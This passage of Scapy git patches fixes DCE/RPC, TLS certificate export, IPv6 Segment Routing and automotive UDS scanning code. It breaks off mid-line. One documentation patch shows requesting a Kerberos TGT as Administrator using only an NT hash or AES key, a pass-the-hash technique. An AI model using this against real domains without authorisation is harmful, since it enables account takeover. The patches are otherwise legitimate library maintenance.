kwargs.pop("length_is") + length_is = lambda pkt: (_length_is(pkt.underlayer) or pkt.actual_count) + else: + length_is = lambda pkt: pkt.actual_count + # Pass it to the sub-field (actually subclass) if self.LENGTH_FROM: kwargs["length_from"] = length_is elif self.COUNT_FROM: @@ -2008,11 +2014,9 @@ def getfield(self, pkt, s): ndrendian=pkt.ndrendian, offset=offset, actual_count=actual_count, + _underlayer=pkt, ) - if self.from_actual: - remain, val = super(_NDRVarField, self).getfield(final, remain) - else: - remain, val = super(_NDRVarField, self).getfield(pkt, remain) + remain, val = super(_NDRVarField, self).getfield(final, remain) final.value = super(_NDRVarField, self).i2h(pkt, val) return remain, final diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index ac8ff483e62..832767e9e26 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -446,6 +446,35 @@ assert [x.floors[3].rhs.decode().rstrip("\x00") for x in towers if x.floors[3].p tower = next(x for x in towers if x.floors[3].protocol_identifier == 15 and x.floors[3].rhs == b"\\PIPE\\ROUTER\x00") assert tower.floors[0].uuid += DCE/RPC 5 NDR: Test length_is with size_is with after-the-fact size + +# From [MS-RRP] + +class BaseRegQueryValue_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRIntField("lpType", 0)), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpData", + "", + size_is=lambda pkt: (pkt.lpcbData if pkt.lpcbData else 0), + length_is=lambda pkt: (pkt.lpcbLen if pkt.lpcbLen else 0), + ) + ), + NDRFullPointerField(NDRIntField("lpcbData", 0)), + NDRFullPointerField(NDRIntField("lpcbLen", 0)), + NDRIntField("status", 0), + ] + + +pkt = BaseRegQueryValue_Response(b'\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x00U\x00s\x00e\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00', ndr64=True) + +assert pkt.valueof("lpType") == 1 +assert pkt.valueof("lpData").decode("utf-16le") == 'Windows User\x00' +assert pkt.valueof("lpcbData") == 26 +assert pkt.valueof("lpcbLen") == 26 +assert pkt.status == 0 + = DCE/RPC 5 NDR: Test DEPORTED_CONFORMANTS with offsetted padding from scapy.layers.msrpce.mseerr import * From d5337f12ddd1bcebe3f94dd4e150a82282c3da29 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 8 Jul 2025 12:39:55 +0200 Subject: [PATCH 1502/1632] DCE/RPC frag fix + Cert class fixes (#4786) * Fix broken behavior of IOCTL with fragmented DCE/RPC * Fix broken export() function in Cert/Key --- scapy/layers/smbclient.py | 7 ++++--- scapy/layers/tls/cert.py | 39 ++++++++++++++++++++++++++++++--------- 2 files changed, 34 insertions(+), 12 deletions(-) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index c5eece14f05..64b96589612 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1044,8 +1044,9 @@ def send(self, x): if SMB2_IOCTL_Response not in resp: raise ValueError("Failed reading IOCTL_Response ! %s" % resp.NTStatus) data = bytes(resp.Output) + super(SMB_RPC_SOCKET, self).send(data) # Handle BUFFER_OVERFLOW (big DCE/RPC response) - while resp.NTStatus == "STATUS_BUFFER_OVERFLOW": + while resp.NTStatus == "STATUS_BUFFER_OVERFLOW" or data[3] & 2 != 2: # Retrieve DCE/RPC full size resp = self.ins.sr1( SMB2_Read_Request( @@ -1053,8 +1054,8 @@ def send(self, x): ), verbose=0, ) - data += resp.Data - super(SMB_RPC_SOCKET, self).send(data) + data = resp.Data + super(SMB_RPC_SOCKET, self).send(data) else: # Use WriteRequest/ReadRequest pkt = SMB2_Write_Request( diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 6b0dc24bfa4..40c3cd200fc 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -284,15 +284,20 @@ def public_numbers(self, *args, **kwargs): def key_size(self): return self.pubkey.key_size - def export(self, filename, fmt="DER"): + def export(self, filename, fmt=None): """ Export public key in 'fmt' format (DER or PEM) to file 'filename' """ + if fmt is None: + if filename.endswith(".pem"): + fmt = "PEM" + else: + fmt = "DER" with open(filename, "wb") as f: if fmt == "DER": - f.write(self.der) + return f.write(self.der) elif fmt == "PEM": - f.write(self.pem) + return f.write(self.pem.encode()) class PubKeyRSA(PubKey, _EncryptAndVerifyRSA): @@ -544,15 +549,20 @@ def der(self): encryption_algorithm=serialization.NoEncryption() ) - def export(self, filename, fmt="DER"): + def export(self, filename, fmt=None): """ Export private key in 'fmt' format (DER or PEM) to file 'filename' """ + if fmt is None: + if filename.endswith(".pem"): + fmt = "PEM" + else: + fmt = "DER" with open(filename, "wb") as f: if fmt == "DER": - f.write(self.der) + return f.write(self.der) elif fmt == "PEM": - f.write(self.pem) + return f.write(self.pem.encode()) class PrivKeyRSA(PrivKey, _DecryptAndSignRSA): @@ -826,6 +836,12 @@ def setSubjectPublicKeyFromPrivateKey(self, key): else: raise ValueError("Unknown type 'key', should be PubKey or PrivKey") + def resignWith(self, key): + """ + Resign a certificate with a specific key + """ + self.import_from_asn1pkt(key.resignCert(self)) + def remainingDays(self, now=None): """ Based on the value of notAfter field, returns the number of @@ -896,15 +912,20 @@ def pem(self): def der(self): return bytes(self.x509Cert) - def export(self, filename, fmt="DER"): + def export(self, filename, fmt=None): """ Export certificate in 'fmt' format (DER or PEM) to file 'filename' """ + if fmt is None: + if filename.endswith(".pem"): + fmt = "PEM" + else: + fmt = "DER" with open(filename, "wb") as f: if fmt == "DER": - f.write(self.der) + return f.write(self.der) elif fmt == "PEM": - f.write(self.pem) + return f.write(self.pem.encode()) def show(self): print("Serial: %s" % self.serial) From 316945f8ed19829dbe83c70ed6af86ad2e198f94 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 9 Jul 2025 17:12:24 +0200 Subject: [PATCH 1503/1632] Add request_tgt example with a hash --- doc/scapy/layers/kerberos.rst | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index 8b8f78a0fe0..54998108188 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -56,6 +56,18 @@ This section tries to give many usage examples, but isn't exhaustive. For more d >>> # We use ticket 1 from the above store. >>> smbclient("dc1.domain.local", ssp=t.ssp(1)) +- **Request a TGT using a hash**: see the docstring of :func:`~scapy.layers.kerberos.krb_as_req` + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import EncryptionType + >>> load_module("ticketer") + >>> t = Ticketer() + >>> # Using the HashNT + >>> t.request_tgt("Administrator@DOMAIN.LOCAL", key=Key(EncryptionType.RC4_HMAC, bytes.fromhex("2b576acbe6bcfda7294d6bd18041b8fe"))) + >>> # Using the AES-256-SHA1-96 Kerberos Key + >>> t.request_tgt("Administrator@domain.local", key=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex("63a2577d8bf6abeba0847cded36b9aed202c23750eb9c56b6155be1cc946bb1d"))) + - **Renew a TGT or ST**: .. code:: From bdfacb691c4f366e8c00a5bec78f1064b08d8649 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 11 Jul 2025 13:05:07 +0200 Subject: [PATCH 1504/1632] Update TLS doc (#4788) --- scapy/layers/tls/cert.py | 28 ++++++++++++++++++++++------ 1 file changed, 22 insertions(+), 6 deletions(-) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 40c3cd200fc..7a491ef61ee 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -10,14 +10,30 @@ Supports both RSA and ECDSA objects. The classes below are wrappers for the ASN.1 objects defined in x509.py. -For instance, here is what you could do in order to modify the serial of -'cert' and then resign it with whatever 'key':: +For instance, here is what you could do in order to modify the subject public +key info of a 'cert' and then resign it with whatever 'key':: - f = open('cert.der') - c = X509_Cert(f.read()) + from scapy.layers.tls.cert import * + cert = Cert("cert.der") + k = PrivKeyRSA() # generate a private key + cert.setSubjectPublicKeyFromPrivateKey(k) + cert.resignWith(k) + cert.export("newcert.pem") + k.export("mykey.pem") + +One could also edit arguments like the serial number, as such:: + + from scapy.layers.tls.cert import * + c = Cert("mycert.pem") c.tbsCertificate.serialNumber = 0x4B1D - k = PrivKey('key.pem') - new_x509_cert = k.resignCert(c) + k = PrivKey("mykey.pem") # import an existing private key + c.resignWith(k) + c.export("newcert.pem") + +To export the public key of a private key:: + + k = PrivKey("mykey.pem") + k.pubkey.export("mypubkey.pem") No need for obnoxious openssl tweaking anymore. :) """ From 3d1763c4ac7481ddb94aae9883fa7dcf2aa02aae Mon Sep 17 00:00:00 2001 From: Kevin Gong Date: Fri, 11 Jul 2025 19:11:48 +0800 Subject: [PATCH 1505/1632] Fix Segment Routing Pad1 TLV definition (#4611) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit In RFC 8754, 2.1.1.1, Pad1 is a single byte. --- scapy/layers/inet6.py | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 63681b0bee6..b585c92ea70 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1047,10 +1047,8 @@ class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Pad1 TLV" - # RFC8754 sect 2.1.1.1 - fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs), - FieldLenField("len", None, length_of="padding", fmt="B"), - StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 + # RFC8754 sect 2.1.1.1, Pad1 is a single byte + fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs)] class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): From 149a93c8a7d2a3a64d8e7f9ba59b688e667d5681 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 11 Jul 2025 13:12:26 +0200 Subject: [PATCH 1506/1632] Fix answer function for UDS_HSFZSocket (#4776) --- scapy/contrib/automotive/bmw/hsfz.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index b474abfd071..9758c078656 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -186,7 +186,7 @@ def send(self, x): def recv(self, x=MTU, **kwargs): # type: (Optional[int], **Any) -> Optional[Packet] pkt = super(UDS_HSFZSocket, self).recv(x) - if pkt: + if pkt and pkt.control == 1: return self.outputcls(bytes(pkt.payload), **kwargs) else: return pkt From c194b8452a3f0d3856783f738e39b3bcebf34ca7 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 11 Jul 2025 13:12:51 +0200 Subject: [PATCH 1507/1632] A few UDS, GMLAN and AutomotiveScanner updates (#4777) * A few UDS, GMLAN and AutomotiveScanner updates * add unit test --- scapy/contrib/automotive/bmw/definitions.py | 10 ++-- scapy/contrib/automotive/gm/gmlan.py | 10 ++-- scapy/contrib/automotive/obd/obd.py | 11 ++-- .../contrib/automotive/scanner/enumerator.py | 10 ++++ scapy/contrib/automotive/scanner/executor.py | 55 ++++++++++++------- scapy/contrib/automotive/scanner/graph.py | 3 + scapy/contrib/automotive/uds.py | 39 +++++++------ scapy/contrib/automotive/uds_scan.py | 53 ++++++++++++++++-- test/contrib/automotive/uds.uts | 15 +++++ 9 files changed, 149 insertions(+), 57 deletions(-) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 3746fc9a296..fe75c27cf5c 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -9,7 +9,7 @@ from scapy.packet import Packet, bind_layers from scapy.fields import ByteField, ShortField, ByteEnumField, X3BytesField, \ - StrField, StrFixedLenField, LEIntField, LEThreeBytesField, \ + StrField, StrFixedLenField, LEThreeBytesField, \ PacketListField, IntField, IPField, ThreeBytesField, ShortEnumField, \ XStrFixedLenField from scapy.contrib.automotive.uds import UDS, UDS_RDBI, UDS_DSC, UDS_IOCBI, \ @@ -321,14 +321,16 @@ class SVK(Packet): 3: "software entry incompatible to hardware entry", 4: "software entry incompatible with other software entry"} + @staticmethod + def get_length(p: Packet): + return len(p.original) - (8 * p.entries_count + 7) + fields_desc = [ ByteEnumField("prog_status1", 0, prog_status_enum), ByteEnumField("prog_status2", 0, prog_status_enum), ShortField("entries_count", 0), SVK_DateField("prog_date", 0), - ByteField("pad1", 0), - LEIntField("prog_milage", 0), - StrFixedLenField("pad2", b'\x00\x00\x00\x00\x00', length=5), + StrFixedLenField("pad", b'\x00', length_from=get_length), PacketListField("entries", [], SVK_Entry, count_from=lambda x: x.entries_count)] diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index ce88513c99d..76c9cf110f1 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -41,11 +41,11 @@ if conf.contribs['GMLAN']['treat-response-pending-as-answer']: pass except KeyError: - log_automotive.info("Specify \"conf.contribs['GMLAN'] = " - "{'treat-response-pending-as-answer': True}\" to treat " - "a negative response 'RequestCorrectlyReceived-" - "ResponsePending' as answer of a request. \n" - "The default value is False.") + # log_automotive.info("Specify \"conf.contribs['GMLAN'] = " + # "{'treat-response-pending-as-answer': True}\" to treat " + # "a negative response 'RequestCorrectlyReceived-" + # "ResponsePending' as answer of a request. \n" + # "The default value is False.") conf.contribs['GMLAN'] = {'treat-response-pending-as-answer': False} conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = None diff --git a/scapy/contrib/automotive/obd/obd.py b/scapy/contrib/automotive/obd/obd.py index 2256ed711d2..a165935d2c3 100644 --- a/scapy/contrib/automotive/obd/obd.py +++ b/scapy/contrib/automotive/obd/obd.py @@ -9,7 +9,6 @@ import struct -from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.obd.iid.iids import * from scapy.contrib.automotive.obd.mid.mids import * from scapy.contrib.automotive.obd.pid.pids import * @@ -24,11 +23,11 @@ if conf.contribs['OBD']['treat-response-pending-as-answer']: pass except KeyError: - log_automotive.info("Specify \"conf.contribs['OBD'] = " - "{'treat-response-pending-as-answer': True}\" to treat " - "a negative response 'requestCorrectlyReceived-" - "ResponsePending' as answer of a request. \n" - "The default value is False.") + # log_automotive.info("Specify \"conf.contribs['OBD'] = " + # "{'treat-response-pending-as-answer': True}\" to treat " + # "a negative response 'requestCorrectlyReceived-" + # "ResponsePending' as answer of a request. \n" + # "The default value is False.") conf.contribs['OBD'] = {'treat-response-pending-as-answer': False} diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 98210f86a37..c778b56f53b 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -191,6 +191,12 @@ def _get_initial_requests(self, **kwargs): def __reduce__(self): # type: ignore f, t, d = super(ServiceEnumerator, self).__reduce__() # type: ignore + + try: + del d["_tester_present_sender"] + except KeyError: + pass + try: for k, v in d["_request_iterators"].items(): d["_request_iterators"][k] = list(v) @@ -287,6 +293,10 @@ def pre_execute(self, socket, state, global_configuration): except KeyError: self._tester_present_sender = None + def post_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + self._tester_present_sender = None + def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None self.check_kwargs(kwargs) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 1965d27cfad..3d0ff3a5991 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -162,20 +162,20 @@ def reset_target(self): def reconnect(self): # type: () -> None - if self.reconnect_handler: - try: - if self.socket: - self.socket.close() - except Exception as e: - log_automotive.exception( - "Exception '%s' during socket.close", e) - - log_automotive.info("Target reconnect") - socket = self.reconnect_handler() - if not isinstance(socket, SingleConversationSocket): - self.socket = SingleConversationSocket(socket) - else: - self.socket = socket + if not self.reconnect_handler: + return + + try: + if self.socket: + self.socket.close() + except Exception as e: + log_automotive.exception( + "Exception '%s' during socket.close", e) + + log_automotive.info("Target reconnect") + socket = self.reconnect_handler() + self.socket = socket if isinstance(socket, SingleConversationSocket) \ + else SingleConversationSocket(socket) if self.socket and self.socket.closed: raise Scapy_Exception( @@ -290,7 +290,12 @@ def scan(self, timeout=None): kill_time = None else: kill_time = time.monotonic() + timeout - while kill_time is None or kill_time > time.monotonic(): + while True: + terminate = kill_time and kill_time <= time.monotonic() + if terminate: + log_automotive.debug( + "Execution time exceeded. Terminating scan!") + return test_case_executed = False log_automotive.info("[i] Scan progress %0.2f", self.progress()) log_automotive.debug("[i] Scan paths %s", self.state_paths) @@ -400,6 +405,20 @@ def enter_state(self, prev_state, next_state): trans_func, trans_kwargs, clean_func = funcs state_changed = trans_func( self.socket, self.configuration, trans_kwargs) + + if self.socket.closed: + for i in range(5): + try: + self.reconnect() + break + except Exception: + if i == 4: + raise + if self.configuration.stop_event: + self.configuration.stop_event.wait(1) + else: + time.sleep(1) + if state_changed: self.target_state = next_state @@ -416,15 +435,11 @@ def cleanup_state(self): Executes all collected cleanup functions from a traversed path :return: None """ - if not self.socket: - log_automotive.warning("Socket is None! Leaving cleanup_state") - return - for f in self.cleanup_functions: if not callable(f): continue try: - if not f(self.socket, self.configuration): + if not f(self.socket, self.configuration): # type: ignore log_automotive.info( "Cleanup function %s failed", repr(f)) except (OSError, ValueError, Scapy_Exception) as e: diff --git a/scapy/contrib/automotive/scanner/graph.py b/scapy/contrib/automotive/scanner/graph.py index 444cd98b759..3a3aa46cbd2 100644 --- a/scapy/contrib/automotive/scanner/graph.py +++ b/scapy/contrib/automotive/scanner/graph.py @@ -54,6 +54,9 @@ def add_edge(self, edge, transition_function=None): :param edge: edge from node to node :param transition_function: tuple with enter and cleanup function """ + if edge[1] in self.edges[edge[0]]: + # Edge already exists + return self.edges[edge[0]].append(edge[1]) self.weights[edge] = 1 self.__transition_functions[edge] = transition_function diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 97ebcdc4daf..978bf6a0483 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -21,7 +21,6 @@ PacketField from scapy.packet import Packet, bind_layers, NoPayload, Raw from scapy.config import conf -from scapy.error import log_loading from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP @@ -35,14 +34,13 @@ if conf.contribs['UDS']['treat-response-pending-as-answer']: pass except KeyError: - log_loading.info("Specify \"conf.contribs['UDS'] = " - "{'treat-response-pending-as-answer': True}\" to treat " - "a negative response 'requestCorrectlyReceived-" - "ResponsePending' as answer of a request. \n" - "The default value is False.") + # log_loading.info("Specify \"conf.contribs['UDS'] = " + # "{'treat-response-pending-as-answer': True}\" to treat " + # "a negative response 'requestCorrectlyReceived-" + # "ResponsePending' as answer of a request. \n" + # "The default value is False.") conf.contribs['UDS'] = {'treat-response-pending-as-answer': False} - conf.debug_dissector = True @@ -1096,9 +1094,12 @@ class UDS_RDTCIPR(Packet): ByteEnumField('reportType', 0, UDS_RDTCI.reportTypes), ConditionalField( FlagsField('DTCStatusAvailabilityMask', 0, 8, UDS_RDTCI.dtcStatus), - lambda pkt: pkt.reportType in [0x01, 0x07, 0x11, 0x12, 0x02, 0x0A, - 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, - 0x15]), + lambda pkt: pkt.reportType in [0x01, 0x07, 0x09, 0x11, 0x12, 0x02, 0x0A, + 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, 0x15]), + ConditionalField(ByteField('DTCSeverity', 0), + lambda pkt: pkt.reportType in [0x09]), + ConditionalField(ByteField('DTCFunctionalUnit', 0), + lambda pkt: pkt.reportType in [0x09]), ConditionalField(ByteEnumField('DTCFormatIdentifier', 0, {0: 'ISO15031-6DTCFormat', 1: 'UDS-1DTCFormat', @@ -1111,12 +1112,11 @@ class UDS_RDTCIPR(Packet): 0x11, 0x12]), ConditionalField(PacketListField('DTCAndStatusRecord', None, pkt_cls=DTCAndStatusRecord), - lambda pkt: pkt.reportType in [0x02, 0x0A, 0x0B, + lambda pkt: pkt.reportType in [0x02, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, 0x15]), ConditionalField(StrField('dataRecord', b""), - lambda pkt: pkt.reportType in [0x03, 0x08, 0x09, - 0x10, 0x14]), + lambda pkt: pkt.reportType in [0x03, 0x08, 0x10, 0x14]), ConditionalField(PacketField('snapshotRecord', None, pkt_cls=DTCSnapshotRecord), lambda pkt: pkt.reportType in [0x04]), @@ -1130,6 +1130,8 @@ def answers(self, other): return False if not other.reportType == self.reportType: return False + if self.reportType == 0x02: + return other.DTCStatusMask & self.DTCStatusAvailabilityMask if self.reportType == 0x06: return other.dtc == self.extendedDataRecord.dtcAndStatus.dtc if self.reportType == 0x04: @@ -1168,9 +1170,14 @@ class UDS_RCPR(Packet): ] def answers(self, other): - return isinstance(other, UDS_RC) \ - and other.routineControlType == self.routineControlType \ - and other.routineIdentifier == self.routineIdentifier + if isinstance(other, UDS_RC) \ + and other.routineControlType == self.routineControlType \ + and other.routineIdentifier == self.routineIdentifier: + if isinstance(self.payload, NoPayload): + return True + else: + return self.payload.answers(other.payload) + return False bind_layers(UDS, UDS_RCPR, service=0x71) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index ee2cb004aa6..f30b9643ccb 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -88,7 +88,8 @@ class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) _supported_kwargs.update({ 'delay_state_change': (int, lambda x: x >= 0), - 'overwrite_timeout': (bool, None) + 'overwrite_timeout': (bool, None), + 'close_socket_when_entering_session_2': (bool, None) }) _supported_kwargs["scan_range"] = ( (list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) @@ -107,7 +108,12 @@ class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): unit-test scenarios, this value should be set to False, in order to use the timeout specified by the 'timeout' - argument.""" + argument. + :param bool close_socket_when_entering_session_2: False by default. + This enumerator will close the socket + if session 2 (ProgrammingSession) + was entered, if True. This will + force a reconnect by the executor.""" def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -160,10 +166,21 @@ def get_new_edge(self, config # type: AutomotiveTestCaseExecutorConfiguration ): # type: (...) -> Optional[_Edge] edge = super(UDS_DSCEnumerator, self).get_new_edge(socket, config) + + try: + close_socket = config[UDS_DSCEnumerator.__name__]["close_socket_when_entering_session_2"] # noqa: E501 + except KeyError: + close_socket = False + if edge: state, new_state = edge # Force TesterPresent if session is changed new_state.tp = 1 # type: ignore + try: + if close_socket and new_state.session == 2: # type: ignore + new_state.tp = 0 # type: ignore + except (AttributeError, KeyError): + pass return state, new_state return None @@ -179,9 +196,30 @@ def enter_state_with_tp(sock, # type: _SocketUnion delay = conf[UDS_DSCEnumerator.__name__]["delay_state_change"] except KeyError: delay = 5 + + try: + close_socket = conf[UDS_DSCEnumerator.__name__]["close_socket_when_entering_session_2"] # noqa: E501 + except KeyError: + close_socket = False + conf.stop_event.wait(delay) state_changed = UDS_DSCEnumerator.enter_state( sock, conf, kwargs["req"]) + + try: + session = kwargs["req"].diagnosticSessionType + except AttributeError: + session = 0 + + if close_socket and session == 2: + if not hasattr(sock, "ip"): + log_automotive.warning("Likely closing a CAN based socket! " + "This might be a configuration issue.") + log_automotive.info( + "Entered Programming Session: Closing socket connection") + sock.close() + conf.stop_event.wait(delay) + if not state_changed: UDS_TPEnumerator.cleanup(sock, conf) return state_changed @@ -287,7 +325,7 @@ def _get_initial_requests(self, **kwargs): def _get_table_entry_y(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str resp = tup[2] - if resp is not None: + if resp is not None and resp.service != 0x7f: return "0x%02x %s: %s" % ( tup[1].periodicDataIdentifier, tup[1].sprintf("%UDS_RDBPI.periodicDataIdentifier%"), @@ -1250,11 +1288,12 @@ def default_test_case_clss(self): def uds_software_reset(connection, # type: _SocketUnion - logger=log_automotive # type: logging.Logger + logger=log_automotive, # type: logging.Logger + timeout=0.5 # type: Union[int, float] ): # type: (...) -> None logger.debug("Reset procedure of target started.") resp = connection.sr1(UDS() / UDS_ER(resetType=1), - timeout=5, + timeout=timeout, verbose=False) if resp and resp.service != 0x7f: logger.debug("Reset procedure of target complete") @@ -1262,7 +1301,9 @@ def uds_software_reset(connection, # type: _SocketUnion logger.debug("Couldn't reset target with UDS_ER. " "At least try to set target back to DefaultSession") - resp = connection.sr1(UDS() / UDS_DSC(b"\x01"), verbose=False, timeout=5) + resp = connection.sr1(UDS() / UDS_DSC(b"\x01"), + verbose=False, + timeout=timeout) if resp and resp.service != 0x7f: logger.debug("Target in DefaultSession") return diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 10691710a91..1545076039d 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -1173,6 +1173,21 @@ assert rdtcipr.DTCAndStatusRecord[0].status == 2 assert not rdtcipr.answers(rdtci) += Check UDS_RDTCIPR extended data + +p = UDS(b'Y\x06\x80SV`\x01\x00\x02\x01\x03\x15') + +assert len(p.extendedDataRecord.extendedData) == 3 + +assert p.extendedDataRecord.extendedData[0].data_type == 1 +assert p.extendedDataRecord.extendedData[1].data_type == 2 +assert p.extendedDataRecord.extendedData[2].data_type == 3 + +assert p.extendedDataRecord.extendedData[0].record == 0 +assert p.extendedDataRecord.extendedData[1].record == 1 +assert p.extendedDataRecord.extendedData[2].record == 0x15 + + = Check UDS_RDTCIPR rdtcipr = UDS(b'\x59\x03\xff\xee\xdd\xaa') From eb08750621e65a18871fce0e5cc446d8c6d5a924 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 11 Jul 2025 13:13:14 +0200 Subject: [PATCH 1508/1632] Add FD support for isotpscan (#4778) --- scapy/contrib/isotp/isotp_native_socket.py | 87 +++++++++++++--------- scapy/contrib/isotp/isotp_scanner.py | 12 ++- 2 files changed, 60 insertions(+), 39 deletions(-) diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 949d24bd75a..76f4332ef15 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -7,20 +7,9 @@ # scapy.contrib.status = library import ctypes -from ctypes.util import find_library -import struct import socket - -from scapy.contrib.isotp import log_isotp -from scapy.packet import Packet -from scapy.error import Scapy_Exception -from scapy.supersocket import SuperSocket -from scapy.data import SO_TIMESTAMPNS -from scapy.config import conf -from scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX -from scapy.contrib.isotp.isotp_packet import ISOTP -from scapy.layers.can import CAN_MTU, CAN_FD_MTU, CAN_MAX_DLEN, CAN_FD_MAX_DLEN - +import struct +from ctypes.util import find_library # Typing imports from typing import ( Any, @@ -31,6 +20,16 @@ cast, ) +from scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX +from scapy.config import conf +from scapy.contrib.isotp import log_isotp +from scapy.contrib.isotp.isotp_packet import ISOTP +from scapy.data import SO_TIMESTAMPNS +from scapy.error import Scapy_Exception +from scapy.layers.can import CAN_MTU, CAN_FD_MTU, CAN_MAX_DLEN, CAN_FD_MAX_DLEN +from scapy.packet import Packet +from scapy.supersocket import SuperSocket + LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore CAN_ISOTP = 6 # ISO 15765-2 Transport Protocol @@ -71,6 +70,10 @@ CAN_FD_ISOTP_DEFAULT_LL_TX_DL = CAN_FD_MAX_DLEN CAN_ISOTP_DEFAULT_LL_TX_FLAGS = 0 +CANFD_BRS = 1 # /* CAN FD Bit Rate Switch */ +CANFD_ESI = 2 # /* CAN FD Error State Indicator */ +CANFD_FDF = 4 # /* CAN FD FD Flag */ + class tp(ctypes.Structure): # This struct is only used within the sockaddr_can struct @@ -301,6 +304,7 @@ def __init__(self, listen_only=False, # type: bool frame_txtime=CAN_ISOTP_DEFAULT_FRAME_TXTIME, # type: int fd=False, # type: bool + brs=False, # type: bool basecls=ISOTP # type: Type[Packet] ): # type: (...) -> None @@ -331,32 +335,40 @@ def __init__(self, self.listen_only = listen_only self.frame_txtime = frame_txtime self.fd = fd + self.brs = brs if basecls is 